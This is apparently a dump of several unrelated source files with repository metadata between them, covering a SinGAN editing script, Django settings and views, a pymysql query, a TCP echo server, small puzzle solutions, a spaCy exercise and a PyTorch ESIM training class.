real = functions.read_image(opt)
real = functions.adjust_scales2image(real, opt)
Gs, Zs, reals, NoiseAmp = functions.load_trained_pyramid(opt)
if (opt.editing_start_scale < 1) | (opt.editing_start_scale > (len(Gs)-1)):
print("injection scale should be between 1 and %d" % (len(Gs)-1))
else:
ref = functions.read_image_dir(os.path.join(opt.ref_dir, opt.ref_name), opt)
mask = functions.read_image_dir(os.path.join(opt.ref_dir,'{}_mask{}'.format(opt.ref_name[:-4],opt.ref_name[-4:])), opt)
if ref.shape[3] != real.shape[3]:
'''
mask = imresize(mask, real.shape[3]/ref.shape[3], opt)
mask = mask[:, :, :real.shape[2], :real.shape[3]]
ref = imresize(ref, real.shape[3] / ref.shape[3], opt)
ref = ref[:, :, :real.shape[2], :real.shape[3]]
'''
mask = imresize_to_shape(mask, [real.shape[2],real.shape[3]], opt)
mask = mask[:, :, :real.shape[2], :real.shape[3]]
ref = imresize_to_shape(ref, [real.shape[2],real.shape[3]], opt)
ref = ref[:, :, :real.shape[2], :real.shape[3]]
mask = functions.dilate_mask(mask, opt)
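            # Downscale the edited reference to the chosen injection scale and
            # feed it through the remaining generator pyramid; the dilated mask
            # then blends the generated patch back into the original image.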
N = len(reals) - 1
n = opt.editing_start_scale
in_s = imresize(ref, pow(opt.scale_factor, (N - n + 1)), opt)
in_s = in_s[:, :, :reals[n - 1].shape[2], :reals[n - 1].shape[3]]
in_s = imresize(in_s, 1 / opt.scale_factor, opt)
in_s = in_s[:, :, :reals[n].shape[2], :reals[n].shape[3]]
out = SinGAN_generate(Gs[n:], Zs[n:], reals, NoiseAmp[n:], opt, in_s, n=n, num_samples=1)
plt.imsave(os.path.join(dir2save,'start_scale={}.png'.format(opt.editing_start_scale)), functions.convert_image_np(out.detach()), vmin=0, vmax=1)
out = (1-mask)*real+mask*out
plt.imsave(os.path.join(dir2save,'start_scale={}_masked.png'.format(opt.editing_start_scale)), functions.convert_image_np(out.detach()), vmin=0, vmax=1)
|
[
"victorruelle1@hotmail.com"
] |
victorruelle1@hotmail.com
|
fc8f57dcba1a88d5f1ae5e3963414387e47a3e5e
|
2a4fccb212b70bbef7634271b3a0992e8927abd8
|
/shop/migrations/0003_promo_date_fin.py
|
89d89e8e1abad1c780b0d1a8de33a0159d058fb4
|
[] |
no_license
|
snipercode221/cbshop
|
dd9eca3400ea500122289658592af52a81e99f6c
|
d139f27a540a458bc011c175e0899f4716d7ebb2
|
refs/heads/master
| 2022-11-29T23:43:47.304965
| 2020-08-02T00:08:00
| 2020-08-02T00:08:00
| 284,359,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-23 21:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0002_promo_pub'),
]
operations = [
migrations.AddField(
model_name='promo',
name='date_fin',
field=models.DateTimeField(null=True, verbose_name='fin promo'),
),
]
|
[
"snipercode221@gmail.com"
] |
snipercode221@gmail.com
|
4b62cb9c5ec11f7f8d43be007fc17be6e900bf2e
|
56909e729bc02088a79ac1d46111de7a52e4c9a6
|
/venv/dbms.py
|
d747ad4c5c69e6f417d24ff9428ebde68d2bb826
|
[] |
no_license
|
prasanthtummala/ArtGallery-DataBase
|
a1a623ace9554139a6a43f8102d9b5dd96b2d609
|
293ac756c64208a2382df82d861de072797b3fa0
|
refs/heads/master
| 2020-06-12T12:55:07.283929
| 2019-06-28T16:46:54
| 2019-06-28T16:46:54
| 194,305,653
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 622
|
py
|
import pymysql
# Open database connection
db = pymysql.connect("localhost","root","123456","artgallery" )
# prepare a cursor object using cursor() method
cursor = db.cursor()
# Prepare SQL query to SELECT records from the database.
# NOTE: the table name is missing and must be appended to this query.
sql = "SELECT * FROM "
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
results = cursor.fetchall()
for row in results:
MNAME = row[0]
gross = row[1]
# Now print fetched result
print ("{0} {1} ".format(MNAME,gross))
except:
print ("Error: unable to fetch data")
# disconnect from server
db.close()
|
[
"prasanthtummala.17@gmail.com"
] |
prasanthtummala.17@gmail.com
|
516a6530d09f3f2717a8b0cf0e85c849bb9f4ad0
|
f63907d2115becd64704ef1881f3bfcb7ba9047d
|
/sandbox/test/testTemplate.py
|
91ba4b483092ee7a004dca1be860007bfd13cdaa
|
[] |
no_license
|
AseiSugiyama/NZMATH-Python3
|
d456610f72071a654531583228e439ffa8a4db0c
|
f65b176be2e58fafa0eea91f399c9ab17f3f478b
|
refs/heads/master
| 2020-05-21T07:26:51.434191
| 2019-04-27T09:52:18
| 2019-04-27T09:52:18
| 185,959,644
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 989
|
py
|
import unittest
import sandbox.hoge as hoge
class HogeTest (unittest.TestCase):
"""
    Test classes must inherit from unittest.TestCase.
    Their names are suffixed with 'Test'.
"""
def setUp(self):
"""
        setUp is run before each test method runs.
"""
pass
def tearDown(self):
"""
        tearDown is run after each test method runs.
"""
pass
def testHuga(self):
"""
        Every test method has a name prefixed with 'test'.
"""
# asserting something
self.assert_(hoge.ishoge(), "optional message string")
# asserting equality
self.assertEqual(1, hoge.huga)
# The following part is always unedited.
def suite(suffix="Test"):
suite = unittest.TestSuite()
all_names = globals()
for name in all_names:
if name.endswith(suffix):
suite.addTest(unittest.makeSuite(all_names[name], "test"))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
|
[
"devnull@localhost"
] |
devnull@localhost
|
35da38996a54cfbccf733b5859960068514b4714
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2332/60592/271480.py
|
f602a8c01f31dbba291aa53971306002fff48fef
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
base = int(input())
tar = int(input())
res = 0
fun = []
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1:
te += 1
break
mark = 0
while mark <= tem:
mark = pow(base,i)
i+=1
te+=i-3
mark/=base
tem-=mark
if tem!= 0:
te+=1
fun.append(te)
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1 or tem == -1:
te+=1
break
mark = 0
while mark < abs(tem):
mark = pow(base,i)
i+=1
te+=i-2
if tem < 0:
tem+=mark
elif tem>0:
tem-=mark
if tem != 0:
te+=1
fun.append(te)
print(min(fun))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
bc77d77f9880d9fc4b4e175cf37ac58d606f29d5
|
1879ada1df11f83dc0bedc69d06aea619adaf166
|
/collections/lists_01.py
|
c9f2ea884b9417ccaf46ae10ffecbe7c5832b192
|
[] |
no_license
|
larajorge11/python-davor-training
|
0ef4fdb6a07d570b2a233960842ce6bbec84af2d
|
5c14109a53896ead9eb5acac9e6fac1c83f5c406
|
refs/heads/main
| 2023-08-26T19:53:10.168900
| 2021-11-04T22:15:31
| 2021-11-05T16:04:45
| 339,914,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 904
|
py
|
# Lists are mutable
nombres = ['Juan', 'Carla', 'Stefani', 'Jacobo', 'Bianca']
# Print the list of names
print(nombres)
# Accessing elements
print(nombres[0])
print(nombres[-1])  # Last element of the list
# Print a slice (range of elements)
print(nombres[0:2])
print(nombres[:3])
print(nombres[2:])
nombres[1] = 'Davor'
for nombre in nombres:
    print(nombre)
# Ask for the length of the list
print(f'elements in the list: {len(nombres)}')
# Append a new element
nombres.append('Brandon')
print(nombres)
# Insert at a specific index
nombres.insert(1, 'Octavio')
print(nombres)
# Remove an element by value
nombres.remove('Octavio')
print(nombres)
# Remove the last element of the list
nombres.pop()
print(nombres)
# Remove a specific element by index
del nombres[0]
print(nombres)
# Empty the list
nombres.clear()
print(nombres)
# Delete the list object itself (the print below now raises NameError)
del nombres
print(nombres)
|
[
"larajorge11@gmail.com"
] |
larajorge11@gmail.com
|
f319f75c6eda9733cf3e2eea7ec0aba1aac4bbf7
|
43188f92d61c427b34b3806adee717a7f445e60d
|
/mdb/files/views.py
|
647b51ca298e3762ef9906d583995b8dc042e59d
|
[
"MIT"
] |
permissive
|
idbac/maldidb
|
c71205dddae7f337669b9c8b0abb245adc95dfb8
|
b926397c1d5f166d80f1eea5b3ba99dcef9b44dc
|
refs/heads/master
| 2023-08-01T03:31:24.358835
| 2021-09-11T16:37:07
| 2021-09-11T16:37:07
| 332,827,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
from django.shortcuts import render
from .models import UserFile
from django_tables2 import SingleTableView
from .tables import *
# ~ from .forms import *
from django.views.generic.list import ListView
from spectra_search.forms import FileLibraryForm
from chat.models import Library
class UserFilesListView(SingleTableView):
model = UserFile
table_class = UserFileTable
template_name = 'files/user_files.html'
def get_queryset(self, *args, **kwargs):
return UserFile.objects.filter(owner = self.request.user) \
.order_by('-upload_date') #last_modified
class FileUpload(ListView):
model = UserFile
template_name = 'files/file_upload.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['upload_form'] = FileLibraryForm(request = self.request)
u = self.request.user
print(f'self.request{self.request}')
print(f'u{u}')
# own libraries (library_select shares this qs)
q = Library.objects.filter(created_by__exact = u)\
.exclude(lab__lab_type = 'user-uploads')
context['upload_form'].fields['library_select'].queryset = q
return context
|
[
"davidshumway@gmail.com"
] |
davidshumway@gmail.com
|
b8ca63d31d28bcd4eed0f383b52286e292bb95cb
|
50f8a39a43c2f20953e77690d102eabefcb8c348
|
/venv/bin/gunicorn
|
ce4411beceb66e192ef16f8bdeb55039cf5ba357
|
[
"MIT"
] |
permissive
|
asandelarvine/News_App
|
0f5d5917643ded67f770ff60772197064f2e734b
|
393d8314586053024a0924b91d2e1912d12df2f4
|
refs/heads/main
| 2023-09-03T20:22:47.514495
| 2021-11-03T00:55:52
| 2021-11-03T02:00:05
| 422,500,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
#!/home/moringa/random/News_App/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
|
[
"larvine.asande@student.moringaschool.com"
] |
larvine.asande@student.moringaschool.com
|
|
edd7334352747e1e9b08be0af986b1239e3ee6fe
|
5a25edcf994a760688dc7c933e8071bf4ff24df3
|
/exercises/ja/solution_01_08_01.py
|
01762ddd77ee431a33af88413c4449ddfc5b02bc
|
[
"CC-BY-NC-4.0",
"MIT"
] |
permissive
|
heyMP/spacy-course
|
8762990ed6179011680730d9c24d5d34c0a8d954
|
3740c717f0d1090b01c1b0fe23f8e30af3bf0101
|
refs/heads/master
| 2022-11-07T21:52:15.479840
| 2020-06-25T18:13:44
| 2020-06-25T18:13:44
| 275,202,487
| 1
| 0
|
MIT
| 2020-06-26T16:39:32
| 2020-06-26T16:39:31
| null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
import spacy
nlp = spacy.load("en_core_web_sm")
text = "It’s official: Apple is the first U.S. public company to reach a $1 trillion market value"
# Process the text
doc = nlp(text)
for token in doc:
    # Get the token text, part-of-speech tag, and dependency label
token_text = token.text
token_pos = token.pos_
token_dep = token.dep_
    # Format and print
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
|
[
"tamuhey@gmail.com"
] |
tamuhey@gmail.com
|
2f7b555b8a023acfc59b3616b78949d6bc53ab5f
|
3349a0d44da04fd9fae7728ce1315ccf0c82285e
|
/556A - case of zeroes and ones.py
|
c96ebf9ebc0e1aad3e01b362c37be5bd17da4cdb
|
[] |
no_license
|
umairnsr87/Data_Structures_Python
|
959848e546fd4f98959bc14470c26ce91bfb5c9c
|
05b5803521ed2ec7f64d95f08e2f014471dfdfd4
|
refs/heads/master
| 2023-07-18T12:11:55.245699
| 2023-07-16T17:01:09
| 2023-07-16T17:01:09
| 294,360,086
| 0
| 0
| null | 2023-07-16T17:01:10
| 2020-09-10T09:11:11
|
Python
|
UTF-8
|
Python
| false
| false
| 567
|
py
|
from collections import Counter
test = int(input())
strings = input()
# time complexity:O(n)
# while '01' or '10' in strings:
# if '01' in strings:
# strings = strings.replace('01', '')
# elif '10' in strings:
# strings = strings.replace('10', '')
# else:
# break
#
# print(len(strings))
# time complexity:O(1)
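# Each removal deletes one '0' and one '1', so at most min(count0, count1)
# pairs can be removed; the remaining length is len(s) - 2*min(count0, count1),
# i.e. abs(count0 - count1).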
x = Counter(strings)
if (x['0'] == x['1']) and (x['0'] + x['1']) == len(strings):
print(0)
elif not x['1'] or not x['0']:
print(len(strings))
else:
a = min(x['0'], x['1'])
print(len(strings) - 2 * a)
|
[
"umairnsr87@gmail.com"
] |
umairnsr87@gmail.com
|
40b5a35183c69290d55869b4fcaa55d82c2b2f6b
|
a4956b95dea8412758af71fde5b06bee3575a06f
|
/Python/venv/Scripts/pip3-script.py
|
dee4588a446332bfe46f715e02399790b54880e8
|
[
"AFL-3.0"
] |
permissive
|
gzy23/myexercise
|
7188b9ba65562be118775502c4a63c4b5b6d8e67
|
471e45919c44efcb1a879dcade2ff5a87310e372
|
refs/heads/master
| 2022-11-18T22:42:36.622220
| 2020-07-08T10:05:33
| 2020-07-08T10:05:33
| 276,901,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 392
|
py
|
#!F:\gitwork\Python\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
|
[
"gzy_email@2430866021.com"
] |
gzy_email@2430866021.com
|
40654b027f3ff750ac5224e44425c099db471f46
|
8ed759d055c99133eb58d229f291295e77f98286
|
/tcpServer.py
|
43a185103fe5cf01da6efda01f6f455eaa40aa4f
|
[] |
no_license
|
anjali-92/Python
|
67b6fca149604cc6ac81b553c8775f9c9c62f0ab
|
353355c0f95dae0ea956c77111314435e4f30d59
|
refs/heads/master
| 2020-12-28T21:06:38.782775
| 2020-11-19T11:39:59
| 2020-11-19T11:39:59
| 33,402,958
| 0
| 0
| null | 2016-09-23T05:31:33
| 2015-04-04T11:11:00
|
Python
|
UTF-8
|
Python
| false
| false
| 434
|
py
|
# Echo server program
import socket
HOST = '' # Symbolic name meaning all available interfaces
PORT = 50011 # Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(5)
for i in range(0,2):
conn ,addr = s.accept()
print 'Connected by',addr
data = conn.recv(1024)
if not data: break
conn.sendall(data)
conn.close()
s.close()
|
[
"anjalipardeshi92@gmail.com"
] |
anjalipardeshi92@gmail.com
|
afcad36fd990355b106a0e1875b71d72f6cde7f2
|
09911dfbc5b9e994599f15cac7d330582a8e7761
|
/guess.py
|
6870e1ff8bc64281f9fc02dc742c07278dd510fd
|
[] |
no_license
|
Xemicolon/NumberGuessingGame
|
2b05163495598f250f91aaf3ab12da443761ea6b
|
fada9df2420a6171f9e8075b4b8dd76596cf1991
|
refs/heads/master
| 2022-04-24T20:24:12.517192
| 2020-04-21T21:29:58
| 2020-04-21T21:29:58
| 257,325,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 808
|
py
|
from random import randint
def guessTheNumber(difficulty, range, chances):
computer = randint(1, range)
level = str(difficulty)
chances = chances
print(f'Difficulty level: {level}\nChances: {chances}')
while True:
try:
user_input = int(input(f'Guess the number between 1 - {range}: '))
chances -= 1
print(f'Chances you have left: {chances}')
if user_input == computer:
print(f'✅ You got it right!')
break
else:
print(f'❌ That was wrong.')
if chances == 0:
print(f'Game over! You exhausted your chances 😖\n')
break
except ValueError:
print(f'⚠ Please enter a whole number or integer.')
|
[
"1vibenation@gmail.com"
] |
1vibenation@gmail.com
|
eaed1474671f49ae000323f1a00774c7a2c81b26
|
6d54a7a75768fe25dcdc56958f6ab215ac8a92d9
|
/to_do_app/settings.py
|
8bf0d1509732b00159e8c1429647634ce9838e4a
|
[] |
no_license
|
yigitkarabiyik/To-Do-App
|
f3362729230b0af0299a4969df3cff9ebe344457
|
b18e68b9b5ae4b547fab7a0a196a4879aa0055bd
|
refs/heads/main
| 2023-03-11T02:30:23.656828
| 2021-03-02T09:08:48
| 2021-03-02T09:08:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,427
|
py
|
"""
Django settings for to_do_app project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates/')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ylp!o9@47kfr$ql!5#he4fv-k96a30o$$-aa_853hfd2_)(x(0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['127.0.0.1','0.0.0.0']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app_to_do_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware'
]
ROOT_URLCONF = 'to_do_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'to_do_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
|
[
"yigitkarabiyik8@gmail.com"
] |
yigitkarabiyik8@gmail.com
|
3e74f996fc5b64ab1e959cc5a5966dd6c8d6023d
|
8cbb7291096499bd2cefc0bfe9acfdfa0baa1fcc
|
/script_main.py
|
b25feb3f1ae4ad8a1bda1a8f345e4b594389d45c
|
[] |
no_license
|
a1015970/SSE_Exercise2
|
944cbae3c9458ae038fba5e97f27b4fd96873d1c
|
377b3cd496f0ed6bdd446913c980d626a416ac8f
|
refs/heads/master
| 2020-07-18T18:13:41.365392
| 2019-09-29T08:04:04
| 2019-09-29T08:04:04
| 206,290,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,487
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 6 22:45:02 2019
@author: Chris Crouch - a1015970
"""
import analyze_git_commit
from git import Repo, RemoteProgress
import os
class Progress(RemoteProgress):
def update(self, op_code, cur_count, max_count=None, message=''):
print(self._cur_line)
#%%
local_link = "../camel"
remote_link = "https://github.com/apache/camel"
fixing_commit = "235036d2396ae45b6809b72a1983dee33b5ba32"
if not os.path.isdir(local_link):
Repo.clone_from(remote_link, local_link, progress=Progress())
repo = Repo(local_link)
print("\n\n", repo.git.remote('get-url','origin'))
analyze_git_commit.analyze_git_commit(local_link, fixing_commit)
#%%
local_link = "../junit-plugin"
remote_link = "https://github.com/jenkinsci/junit-plugin"
fixing_commit = "15f39fc49d9f25bca872badb48e708a8bb815ea7"
if not os.path.isdir(local_link):
Repo.clone_from(remote_link, local_link, progress=Progress())
repo = Repo(local_link)
print("\n\n", repo.git.remote('get-url','origin'))
analyze_git_commit.analyze_git_commit(local_link, fixing_commit)
#%%
local_link = "../jackson-databind"
remote_link = "https://github.com/FasterXML/jackson-databind"
fixing_commit = "7487cf7eb14be2f65a1eb108e8629c07ef45e0a"
if not os.path.isdir(local_link):
Repo.clone_from(remote_link, local_link, progress=Progress())
repo = Repo(local_link)
print("\n\n", repo.git.remote('get-url','origin'))
analyze_git_commit.analyze_git_commit(local_link, fixing_commit)
|
[
"a1015970@student.adelaide.edu.au"
] |
a1015970@student.adelaide.edu.au
|
f3f53ccefea07832363a3f36b3f24a3daba97a46
|
5898a72d228beb1779ec68247ab89c3391c84ebd
|
/cgi-bin/getWaitingGame.py
|
49b4dbfd7587db29b40a73b4bf55fa6d897686d9
|
[] |
no_license
|
sirramsalott/boggle
|
1a2f1035fc219b3df6edcafaadead0375e62037a
|
242eca21ea982ed7fafec499ff9b18d7e1cd70d6
|
refs/heads/master
| 2022-12-14T06:01:38.561493
| 2020-09-04T08:36:10
| 2020-09-04T08:36:10
| 249,944,772
| 0
| 0
| null | 2022-12-12T16:02:38
| 2020-03-25T10:08:22
|
Python
|
UTF-8
|
Python
| false
| false
| 509
|
py
|
#!/usr/bin/python
import cgi, sys, json, cgitb
from boggleUser import Pupil
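# response() builds the CGI reply: it looks up a waiting game for the pupil,
# clears the pupil's waiting flag if one was found, and returns the result as a
# JSON body with Status/Content-Type/Content-Length headers.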
def response(pupilID):
g = Pupil.getWaitingGame(pupilID)
out = {"found": bool(g)}
if g:
Pupil(pupilID=pupilID).isWaiting(False)
out.update(g)
outJ = json.dumps(out)
return """Status: 200 OK
Content-Type: application/json
Content-Length: {}
{}""".format(len(outJ), outJ)
if __name__ == '__main__':
cgitb.enable()
post = cgi.FieldStorage()
print response(int(post['pupilID'].value))
|
[
"jfr573@cs.bham.ac.uk"
] |
jfr573@cs.bham.ac.uk
|
01a663efab3a49d161c2793fb093704b775a3579
|
32d9ca9bda3d132179e952e3bd94f99f5de2d0cb
|
/train.py
|
420b4f7a24b35b604145e6f28bac12ecdc80322f
|
[] |
no_license
|
mcao516/PyTorch-ESIM
|
280efbae434d680ff0cce4b31ac00f772a9626de
|
5f01cebae70a8401cec61c89939d32da7c7a01df
|
refs/heads/master
| 2022-02-19T12:28:16.041379
| 2019-10-04T15:30:44
| 2019-10-04T15:30:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,146
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.tensorboard import SummaryWriter
from torch.optim.lr_scheduler import MultiStepLR
from sklearn.metrics import classification_report
from ESIM import ESIM
from utils import Progbar, to_device
class Model:
"""Enhanced Sequential Inference Model (ESIM) for natural language inference.
"""
def __init__(self, args):
"""Class initialization.
"""
self.args = args
self.logger = args.logger
# initialziation
self.model = self._build_model()
self.model.to(args.device)
self._initialize_model(self.model)
self.optimizer = self._get_optimizer(self.model)
self.scheduler = self._get_scheduler(self.optimizer)
self.criterion = self._get_criterion()
# multi-gpu training (should be after apex fp16 initialization)
if args.n_gpu > 1:
self.logger.info("- Let's use {} GPUs !".format(torch.cuda.device_count()))
self.model = nn.DataParallel(self.model)
else:
self.logger.info("- Train the model on single GPU :/")
# Distributed training (should be after apex fp16 initialization)
if args.local_rank != -1:
self.logger.info("- Let's do distributed training !")
self.model = nn.parallel.DistributedDataParallel(self.model,
device_ids=[args.local_rank],
output_device=args.local_rank)
# tensorboard
if args.write_summary and args.local_rank in [-1, 0]:
self.logger.info("- Let's use tensorboard on local rank {} device :)".format(args.local_rank))
self.writer = SummaryWriter(self.args.summary_path)
def _build_model(self):
"""Build ESIM model.
"""
return ESIM(self.args.vector_size,
self.args.vocab_size,
self.args.hidden_size,
self.args.class_num,
self.args.dropout)
def _initialize_model(self, model):
"""Initialize ESIM model paramerters.
"""
for p in model.parameters():
if p.dim() > 1:
nn.init.uniform_(p, a=-0.1, b=0.1)
def initialize_embeddings(self, vectors):
"""Load pre-trained word embeddings.
"""
if isinstance(self.model, nn.DataParallel):
self.model.module.load_embeddings(vectors)
else:
self.model.load_embeddings(vectors)
def _set_parameter_requires_grad(self):
"""Specify which parameters need compute gradients.
"""
# we don't need this right now
pass
def _get_optimizer(self, model):
"""Get optimizer for model training.
"""
if self.args.optimizer == 'sgd':
optimizer = optim.SGD(model.parameters(),
lr=self.args.lr,
momentum=self.args.momentum)
elif self.args.optimizer == 'adam':
optimizer = optim.Adam(model.parameters(), lr=self.args.lr)
else:
self.logger.info("Unknow optimizer: {}, exiting...".format(self.args.optimizer))
exit()
return optimizer
def _get_scheduler(self, optimizer):
"""Get scheduler for adjusting learning rate.
"""
return MultiStepLR(optimizer, milestones=[25], gamma=0.1)
def _get_criterion(self):
"""Loss function.
"""
return nn.CrossEntropyLoss()
def load_weights(self, model_dir):
"""Load pre-trained model weights.
"""
self.model.load_state_dict(torch.load(os.path.join(model_dir, "esim.pickle")))
def save_model(self, model_dir=None):
"""Save model's weights.
"""
if not model_dir:
model_dir = self.args.model_dir
torch.save(self.model.state_dict(), os.path.join(model_dir, "esim.pickle"))
self.logger.info("- ESIM model is saved at: {}".format(
os.path.join(model_dir, "esim.pickle")))
def loss_batch(self, p, h, labels, criterion, optimizer=None):
"""
Arguments:
p {torch.Tensor} -- premise [batch, seq_len]
h {torch.Tensor} -- hypothesis [batch, seq_len]
labels {torch.Tensor} -- hypothesis [batch]
criterion {torch.nn.Loss} -- loss function
Keyword Arguments:
optimizer {torch.optim.Optimizer} -- PyTorch optimizer
Returns:
logits {torch.Tensor} -- raw, unnormalized scores for each class
with shape [batch, class_num]
"""
logits = self.model(p, h)
loss = criterion(logits, labels)
if self.args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
if optimizer is not None:
with torch.set_grad_enabled(True):
loss.backward() # compute gradients
nn.utils.clip_grad_norm_(self.model.parameters(),
self.args.max_grad_norm)
optimizer.step() # update model parameters
optimizer.zero_grad() # clean all gradients
return loss.item(), logits.detach()
def train_epoch(self, train_iter, criterion, optimizer, epoch):
"""Train the model for one single epoch.
"""
self.model.train() # set the model to training mode
prog = Progbar(target=len(train_iter))
train_loss = 0.0
for i, batch in enumerate(train_iter):
batch_data = to_device(batch, self.args.device)
batch_loss, _ = self.loss_batch(batch_data['premise'],
batch_data['hypothesis'],
batch_data['label'],
criterion,
optimizer=optimizer)
train_loss += batch_loss
prog.update(i + 1, [("train loss", batch_loss)])
if self.args.local_rank in [-1, 0] and self.writer:
self.writer.add_scalar('batch_loss', batch_loss, epoch*len(train_iter) + i + 1)
# compute the average loss (batch loss)
epoch_loss = train_loss / len(train_iter)
# update scheduler
self.scheduler.step()
return epoch_loss
def evaluate(self, dev_iter, criterion):
"""Evaluate the model.
"""
self.model.eval() # set the model to evaluation mode
with torch.no_grad():
eval_loss, eval_corrects = 0.0, 0.0
for _, batch in enumerate(dev_iter):
batch_data = to_device(batch, self.args.device)
batch_loss, outputs = self.loss_batch(batch_data['premise'],
batch_data['hypothesis'],
batch_data['label'],
criterion,
optimizer=None)
_, preds = torch.max(outputs, 1) # preds: [batch_size]
eval_loss += batch_loss
eval_corrects += torch.sum(preds == (batch_data['label'])).double()
avg_loss = eval_loss / len(dev_iter)
avg_acc = eval_corrects / len(dev_iter.dataset)
return avg_loss, avg_acc
def fit(self, train_iter, dev_iter):
"""Model training and evaluation.
"""
best_acc = 0.
num_epochs = self.args.num_epochs
for epoch in range(num_epochs):
self.logger.info('Epoch {}/{}'.format(epoch + 1, num_epochs))
# training
train_loss = self.train_epoch(train_iter, self.criterion, self.optimizer, epoch)
self.logger.info("Traing Loss: {}".format(train_loss))
# evaluation, only on the master node
if self.args.local_rank in [-1, 0]:
eval_loss, eval_acc = self.evaluate(dev_iter, self.criterion)
self.logger.info("Evaluation:")
self.logger.info("- loss: {}".format(eval_loss))
self.logger.info("- acc: {}".format(eval_acc))
# monitor loss and accuracy
if self.writer:
self.writer.add_scalar('epoch_loss', train_loss, epoch)
